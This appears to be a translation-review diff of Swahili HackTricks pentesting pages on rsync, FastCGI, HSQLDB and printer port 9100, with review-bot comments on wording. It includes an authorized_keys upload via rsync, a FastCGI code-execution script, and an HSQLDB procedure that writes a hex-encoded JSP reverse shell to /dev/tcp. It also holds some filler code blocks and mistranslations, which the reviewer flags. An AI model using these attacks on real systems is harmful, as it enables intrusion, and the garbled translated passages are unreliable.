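Review bot: in the added sentence, `ushirikiano wa directory` translates "directory shares" with a word that means cooperation or partnership; `saraka zilizoshirikiwa` (the removed line used `kushiriki folda`) keeps the meaning. The same line leaves `directory` untranslated while the rest of the file uses `folda` and `saraka`; pick one term and use it throughout.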
@ -81,13 +60,13 @@ msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
Kuwa makini kwamba baadhi ya hisa huenda zisionekane kwenye orodha, huenda zikifichwa. Aidha, kupata baadhi ya hisa kunaweza kuwa na kikwazo cha **vitambulisho** maalum, kama inavyoonyeshwa na ujumbe wa **"Access Denied"**.
Kumbuka kwamba baadhi ya sehemu zinaweza kutokuwepo kwenye orodha, huenda zikifichwa. Aidha, kufikia baadhi ya sehemu kunaweza kuwa na vizuizi kwa **credentials** maalum, vinavyoonyeshwa na ujumbe wa **"Access Denied"**.
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync)
### Matumizi ya Rsync kwa Mikono
### Matumizi ya Manual Rsync
Baada ya kupata orodha ya **moduli**, hatua zinategemea kama uwakilishi unahitaji uwakilishaji. Bila uwakilishaji, **kuorodhesha** na **kukopi** faili kutoka kwenye folda iliyoshirikiwa kwenda kwenye saraka ya ndani inafanikiwa kupitia:
Baada ya kupata **module list**, hatua zinategemea kama uthibitisho unahitajika. Bila uthibitisho, **kuorodhesha** na **kunakili** faili kutoka kwa folda iliyoshirikiwa hadi directory ya ndani inafanywa kupitia:
```bash
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
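Review bot: the new heading `### Matumizi ya Manual Rsync` is half translated; either keep the removed `### Matumizi ya Rsync kwa Mikono` or use the English `Manual Rsync Usage`, consistent with the other English headings in this file. In the sentence below it, `**module list**` is left in English where the removed line had `moduli`, the term used elsewhere on the page.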
@ -95,14 +74,14 @@ rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
Mchakato huu **unaendeleza faili kwa njia ya kurejesha**, ukilinda sifa na ruhusa zake.
Hii mchakato **huhamasisha faili kwa njia ya kurudi**, ikihifadhi sifa na ruhusa zao.
Kwa **vitambulisho**, orodha na kupakua kutoka kwenye folda iliyoshirikiwa inaweza kufanywa kama ifuatavyo, ambapo itaonekana ombi la nenosiri:
Kwa **vithibitisho**, orodha na kupakua kutoka kwa folda iliyopewa inaweza kufanywa kama ifuatavyo, ambapo dirisha la nenosiri litajitokeza:
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
Kutuma **maudhui**, kama faili ya _**authorized_keys**_ kwa ajili ya ufikiaji, tumia:
Ili **kupakia maudhui**, kama faili ya _**authorized_keys**_ kwa ufikiaji, tumia:
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
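Review bot: `Hii mchakato **huhamasisha faili kwa njia ya kurudi**` has three problems: the demonstrative should follow the noun and agree with its class (`Mchakato huu`), `huhamasisha` means "motivates" (the verb for transferring is `huhamisha`), and `kwa njia ya kurudi` ("by way of returning") does not convey "recursively"; keeping the English word `recursively` in parentheses would avoid ambiguity. In the next sentence `vithibitisho` is used for credentials while the hunk above leaves `credentials` in English; choose one term for the page.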
@ -112,22 +91,22 @@ Ili kupata faili ya usanidi ya rsyncd, tekeleza:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
Ndani ya faili hii, parameteri ya _secrets file_ inaweza kuashiria faili inayohifadhi **majina ya watumiaji na nywila** kwa ajili ya uwakiki wa rsyncd.
Katika faili hii, parameter ya _secrets file_ inaweza kuelekeza kwenye faili inayoshikilia **majina ya watumiaji na nywila** za uthibitishaji wa rsyncd.
## Marejeo
* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
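Review bot: the context line `## Marejeo` is left in Swahili here while the same heading in the other files of this commit is changed to `## References` (the IPMI and echo pages). If headings are being normalised to English, this one was missed.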


@ -1,19 +1,20 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Ikiwa unataka **kujifunza ni nini FastCGI** angalia ukurasa ufuatao:
@ -21,11 +22,11 @@ Ikiwa unataka **kujifunza ni nini FastCGI** angalia ukurasa ufuatao:
[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)
{% endcontent-ref %}
Kwa chaguo-msingi **FastCGI** inaendesha kwenye **bandari** **9000** na haikubaliki na nmap. **Kawaida** FastCGI inasikiliza tu kwenye **localhost**.
Kwa kawaida **FastCGI** inafanya kazi kwenye **bandari** **9000** na haitambuliwi na nmap. **Kawaida** FastCGI inasikiliza tu kwenye **localhost**.
# RCE
Ni rahisi sana kufanya FastCGI itekeleze nambari za kupindukia:
Ni rahisi sana kufanya FastCGI kutekeleza msimbo wowote:
```bash
#!/bin/bash
@ -45,19 +46,20 @@ cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
cat $OUTPUT
done
```
Au unaweza kutumia script ya Python ifuatayo: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
au unaweza pia kutumia skripti ifuatayo ya python: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
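Review bot: the shared footer block is translated inconsistently across this commit. Here the replacement lines L8526-L8528 are Swahili ("Angalia [**mpango wa usajili**]...", "Shiriki mbinu za hacking..."), but the identical replacement in the HSQLDB, printer and Cassandra files below (L8547-L8549, L8666-L8668, L8755-L8757) stays English ("Check the [**subscription plans**]..."), and the new `<summary>` on L8519 is English "Support HackTricks" sitting between Swahili lines. Pick one language for the boilerplate and apply the same text to every file rather than re-translating it per page. The handle fix on L8527 (link text `@hacktricks_live` now matching the `twitter.com/hacktricks_live` URL, where L8524 had `@carlospolopm`) is correct.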

View file

@ -1,104 +1,96 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** ni mfumo wa hifadhidata ya uhusiano wa SQL unaongoza ulioandikwa kwa Java. Inatoa injini ndogo, haraka yenye uwezo wa kushughulikia nyuzi nyingi na hifadhidata ya shughuli na meza za kumbukumbu na kumbukumbu ya diski na inasaidia njia za kujumuisha na seva.
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** ni mfumo mkuu wa hifadhidata ya SQL inayohusiana iliyoandikwa kwa Java. Inatoa injini ndogo, ya haraka ya hifadhidata yenye nyuzi nyingi na ya muamala yenye meza za ndani na za diski na inasaidia hali za embedded na server.
**Bandari ya chaguo-msingi:** 9001
**Default port:** 9001
```text
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# Taarifa
# Information
### Mipangilio ya Awali
### Default Settings
Tafadhali kumbuka kuwa kwa chaguo-msingi huduma hii inaweza kuendeshwa kwenye kumbukumbu au imefungwa kwenye localhost. Ikiwa umepata huduma hii, labda umetumia huduma nyingine na unatafuta kuongeza mamlaka.
Kumbuka kwamba kwa default huduma hii inawezekana inafanya kazi katika kumbukumbu au imefungwa kwa localhost. Ikiwa umeipata, huenda umepata huduma nyingine na unatafuta kuongeza mamlaka.
Kitambulisho cha chaguo-msingi kawaida ni `sa` na neno la siri tupu.
Maalum ya default mara nyingi ni `sa` bila nenosiri.
Ikiwa umetumia huduma nyingine, tafuta kitambulisho kinachowezekana kwa kutumia
Ikiwa umefanikiwa katika huduma nyingine, tafuta maelezo yanayowezekana kwa kutumia
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
Chukua jina la database kwa umakini - utalihitaji kuunganisha.
Note the database name carefully - youll need it to connect.
# Kukusanya Taarifa
# Info Gathering
Unaweza kuunganisha kwenye kifaa cha DB kwa [kupakua HSQLDB](https://sourceforge.net/projects/hsqldb/files/) na kuchambua `hsqldb/lib/hsqldb.jar`. Chalisha programu ya GUI (eww) kwa kutumia `java -jar hsqldb.jar` na unganisha kwenye kifaa kwa kutumia siri zilizopatikana/dhaifu.
Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials.
Chukua taarifa ya uunganisho URL itaonekana kama hii kwa mfumo wa mbali: `jdbc:hsqldb:hsql://ip/DBNAME`.
Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`.
# Mbinu
# Tricks
## Rutini za Lugha ya Java
## Java Language Routines
Tunaweza kuita njia za static za darasa la Java kutoka HSQLDB kwa kutumia Rutini za Lugha ya Java. Tambua kwamba darasa linaloitwa linahitaji kuwa kwenye njia ya darasa ya programu.
We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the applications classpath.
JRTs zinaweza kuwa `kazi` au `taratibu`. Kazi zinaweza kuitwa kupitia taarifa za SQL ikiwa njia ya Java inarudisha moja au zaidi ya pembejeo za SQL zinazoweza kulinganishwa. Zinaitwa kwa kutumia taarifa ya `VALUES`.
JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement.
Ikiwa njia ya Java tunayotaka kuita inarudisha void, tunahitaji kutumia taratibu zinazoitwa kwa kutumia taarifa ya `CALL`.
If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement.
## Kusoma Mali za Mfumo wa Java
## Reading Java System Properties
Unda kazi:
Create function:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
```python
def execute():
# Code to execute the function
pass
```
```python
def tekeleza():
# Nambari ya kutekeleza kazi
pass
```
Tekeleza kazi:
```text
VALUES(getsystemproperty('user.name'))
```
Unaweza kupata [orodha ya mali za mfumo hapa](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
## Andika Yaliyomo kwenye Faili
## Andika Maudhui kwenye Faili
Unaweza kutumia kifaa cha Java `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` kilichopo kwenye JDK \(kimepakuliwa moja kwa moja kwenye njia ya darasa ya programu\) kuandika vitu vilivyohifadhiwa kwa mfumo wa hex kwenye diski kupitia utaratibu maalum. **Tafadhali kumbuka ukubwa wa juu wa 1024 baiti**.
You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Kumbuka ukubwa wa juu wa 1024 bytes**.
Unda utaratibu:
Create procedure:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
Chukua hatua:
Tekeleza utaratibu:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
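Review bot: most replacement lines in this file are untranslated English rather than Swahili, which contradicts the commit's purpose: L8553 "# Basic Information", L8557 "**Default port:** 9001", L8562, L8564, L8575, L8577, L8579, L8581, L8583, L8585, L8587, L8589, L8591, L8595, L8616 and L8622 all swap Swahili for English, and L8620 mixes both languages inside one paragraph ("...via a custom procedure. **Kumbuka ukubwa wa juu wa 1024 bytes**."). Either translate these lines or keep the previous Swahili. Two smaller points: L8575 has "youll" with the apostrophe missing, and the placeholder blocks L8601-L8610 (`def execute(): pass` / `def tekeleza(): pass`) are filler with no relation to the HSQLDB `CREATE FUNCTION` they follow, so make sure they are dropped and not carried into the new version.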

View file

@ -1,45 +1,32 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Kutoka [hapa](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Uchapishaji ghafi ndio tunayotaja kama mchakato wa kufanya uhusiano na bandari 9100/tcp ya printer ya mtandao. Ni njia ya msingi inayotumiwa na CUPS na muundo wa uchapishaji wa Windows kuwasiliana na printa za mtandao kwani inachukuliwa kama '_itifaki rahisi zaidi, ya haraka, na kwa ujumla itifaki ya mtandao yenye uaminifu zaidi inayotumiwa kwa printa_'. Uchapishaji wa bandari ghafi 9100, unaoitwa pia JetDirect, AppSocket au PDL-datastream kimsingi **siyo itifaki ya uchapishaji yenyewe**. Badala yake, **data yote iliyotumwa inashughulikiwa moja kwa moja na kifaa cha uchapishaji**, kama vile uhusiano wa parallel kupitia TCP. Tofauti na LPD, IPP na SMB, hii inaweza kutuma maoni moja kwa moja kwa mteja, ikiwa ni pamoja na hali na ujumbe wa hitilafu. Kituo cha **bidirectional** kama hicho kinatupa **upatikanaji** wa **moja kwa moja** kwa **matokeo** ya amri za **PJL**, **PostScript** au **PCL**. Kwa hivyo, uchapishaji wa bandari ghafi 9100 - ambao unatumiwa na karibu kila printer ya mtandao - hutumiwa kama njia ya uchambuzi wa usalama na PRET na PFT.
Kutoka [hapa](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Uchapishaji wa raw ni kile tunachofafanua kama mchakato wa kuunganisha kwenye bandari 9100/tcp ya printer ya mtandao. Ni njia ya default inayotumiwa na CUPS na usanifu wa uchapishaji wa Windows kuwasiliana na printers za mtandao kwani inachukuliwa kuwa _njia rahisi, ya haraka, na kwa ujumla protokali ya mtandao inayotegemewa zaidi inayotumiwa kwa printers_. Uchapishaji wa bandari 9100 wa raw, pia unajulikana kama JetDirect, AppSocket au PDL-datastream kwa kweli **si protokali ya uchapishaji yenyewe**. Badala yake **data zote zinazotumwa zinachakatwa moja kwa moja na kifaa cha uchapishaji**, kama vile muunganisho wa sambamba kupitia TCP. Kinyume na LPD, IPP na SMB, hii inaweza kutuma mrejesho wa moja kwa moja kwa mteja, ikiwa ni pamoja na hali na ujumbe wa makosa. **Kanal ya pande mbili** kama hii inatupa **ufikiaji** wa moja kwa moja kwa **matokeo** ya **PJL**, **PostScript** au **PCL** amri. Kwa hivyo uchapishaji wa bandari 9100 wa raw ambao unasaidiwa na karibu printer yoyote ya mtandao unatumiwa kama njia ya uchambuzi wa usalama na PRET na PFT.
Ikiwa unataka kujifunza zaidi kuhusu [**kudukua printa soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
Ikiwa unataka kujifunza zaidi kuhusu [**kuvamia printers soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
**Bandari ya chaguo-msingi:** 9100
**Bandari ya default:** 9100
```
9100/tcp open jetdirect
```
# Uchambuzi
# Uhesabu
## Kwa Mkono
### PJL (Printer Job Language)
PJL ni lugha ya amri iliyoundwa kwa ajili ya kudhibiti vifaa vya uchapishaji. Inatumika kwa kuanzisha na kusimamia kazi za uchapishaji kwenye vifaa vya uchapishaji. PJL inaweza kutumiwa kwa kudhibiti vigezo vya uchapishaji kama vile ukubwa wa karatasi, aina ya karatasi, na upangaji wa ukurasa.
Kwa kuchunguza vifaa vya uchapishaji kwa kutumia PJL, unaweza kupata habari muhimu kama vile:
- Jina la mfano wa kifaa cha uchapishaji
- Namba ya toleo la firmware
- Habari za mtandao kama anwani ya IP na anwani ya MAC
- Vigezo vya uchapishaji kama vile ukubwa wa karatasi na aina ya karatasi
- Uwezo wa kudhibiti kazi za uchapishaji kama kuanzisha, kusimamisha, au kufuta kazi za uchapishaji
Kwa kufanya uchunguzi wa PJL, unaweza kupata habari muhimu kuhusu vifaa vya uchapishaji na kutumia habari hiyo kwa uchambuzi zaidi au kwa shughuli za udukuzi.
## Mikono
```bash
nc -vn <IP> 9100
@PJL INFO STATUS #CODE=40000 DISPLAY="Sleep" ONLINE=TRUE
